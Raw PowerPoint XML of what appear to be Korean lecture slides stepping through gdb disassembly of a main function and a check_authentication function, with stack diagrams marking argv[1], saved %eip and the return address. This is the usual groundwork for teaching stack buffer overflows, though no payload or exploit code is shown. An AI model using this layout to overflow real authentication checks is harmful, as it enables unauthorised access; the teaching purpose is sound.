          <a:xfrm flipV="1">
            <a:off x="7047186" y="1024759"/>
            <a:ext cx="1852448" cy="2632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365537-5BB6-3545-942E-3CE4F268D9EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10287000" y="409903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atin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>주소값</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Monac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CB35-B53B-0A49-8D6A-3DF87912E169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8899634" y="470761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7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8355724" cy="6467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  0x08048519 &lt;+0&gt;:	push   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0x0804851a &lt;+1&gt;:	mov    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0x0804851c &lt;+3&gt;:	sub    $0x8,%esp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0x0804851f &lt;+6&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x1,0x8(%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0x08048523 &lt;+10&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>     0x8048547 &lt;main+46&gt;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			.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="30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onaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048547 &lt;+46&gt;:	mov    0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp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0x0804854a &lt;+49&gt;:	add    $0x4,%eax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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2500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0x0804854d &lt;+52&gt;:	mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(%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),%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0x0804854f &lt;+54&gt;:	mov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,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048552 &lt;+57&gt;:	call   0x8048474 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>check_authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="2500" b="1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1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x08048557 &lt;+62&gt;:	test   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en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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onaco" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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7" y="565804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506607" y="3493480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B08799-3689-3C45-A8D2-C5D09121E9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621516" y="486837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60A34-4EBF-BD4A-AFE9-415A183E5AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621515" y="421881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365537-5BB6-3545-942E-3CE4F268D9EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10287000" y="409903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atin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>주소값</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Monac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CB35-B53B-0A49-8D6A-3DF87912E169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8899634" y="470761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C4128-4C39-A24A-838C-5B5742E4B5EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6840387" y="4393901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Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>주소값</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0">
              <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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69F16E-0F17-E442-A278-52755C3C4580}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621514" y="357866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71700-B61E-684E-828D-8947F11278EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621513" y="3620525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	%</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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( </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>check_authentication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리턴주소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96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C681-9FD1-C441-8349-37A64BBF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741EC-A83A-BD47-ACE7-0F5B8183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5000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="5000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="5000" dirty="0"/>
              <a:t>check_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="5000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>함수</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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82558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8355724" cy="6467036"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit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ko-KR" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048474 &lt;+0&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="25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0x08048475 &lt;+1&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%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0x08048477 &lt;+3&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi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0x08048478 &lt;+4&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi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0x08048479 &lt;+5&gt;:	sub    $0x1c,%esp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0x0804847c &lt;+8&gt;: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0x08048483 &lt;+15&gt;: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0x0804848a &lt;+22&gt;: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$0x0,-0x18(%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0x08048491 &lt;+29&gt;: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$0x0,-0x14(%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0x08048498 &lt;+36&gt;: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$0x0,-0x10(%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0x0804849f &lt;+43&gt;:	mov    0x8(%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),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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0x080484a2 &lt;+46&gt;:	mov    %eax,0x4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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7" y="5658045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506606" y="3069223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B08799-3689-3C45-A8D2-C5D09121E9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621516" y="486837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60A34-4EBF-BD4A-AFE9-415A183E5AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621515" y="421881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365537-5BB6-3545-942E-3CE4F268D9EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10287000" y="409903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atin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>주소값</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Monac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CB35-B53B-0A49-8D6A-3DF87912E169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8899634" y="470761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C4128-4C39-A24A-838C-5B5742E4B5EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6840387" y="4393901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Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>주소값</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0">
              <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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69F16E-0F17-E442-A278-52755C3C4580}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621514" y="357866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71700-B61E-684E-828D-8947F11278EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621513" y="3620525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	%</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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( </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>check_authentication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리턴주소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A8DFE-8EA2-9749-8FCF-18A15D0BD5DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621514" y="292910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check_auth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154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8355724" cy="6467036"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048474 &lt;+0&gt;:	push   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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048475 &lt;+1&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="25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0x08048477 &lt;+3&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi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0x08048478 &lt;+4&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi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0x08048479 &lt;+5&gt;:	sub    $0x1c,%esp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0x0804847c &lt;+8&gt;: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0x08048483 &lt;+15&gt;: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0x0804848a &lt;+22&gt;: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$0x0,-0x18(%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0x08048491 &lt;+29&gt;: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$0x0,-0x14(%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0x08048498 &lt;+36&gt;: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$0x0,-0x10(%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0x0804849f &lt;+43&gt;:	mov    0x8(%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),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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0x080484a2 &lt;+46&gt;:	mov    %eax,0x4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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6" y="3244334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506606" y="3019010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B08799-3689-3C45-A8D2-C5D09121E9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621516" y="486837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60A34-4EBF-BD4A-AFE9-415A183E5AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621515" y="421881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365537-5BB6-3545-942E-3CE4F268D9EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10287000" y="409903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atin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>주소값</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Monac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CB35-B53B-0A49-8D6A-3DF87912E169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8899634" y="470761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C4128-4C39-A24A-838C-5B5742E4B5EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6840387" y="4393901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Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>주소값</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0">
              <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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69F16E-0F17-E442-A278-52755C3C4580}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621514" y="357866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71700-B61E-684E-828D-8947F11278EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621513" y="3620525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	%</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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( </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>check_authentication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리턴주소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A8DFE-8EA2-9749-8FCF-18A15D0BD5DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621514" y="292910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check_auth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1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8355724" cy="6467036"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048474 &lt;+0&gt;:	push   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0x08048475 &lt;+1&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048477 &lt;+3&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="25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500" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  0x08048478 &lt;+4&gt;:	push   %</a:t>
            </a:r>
            <a:r>
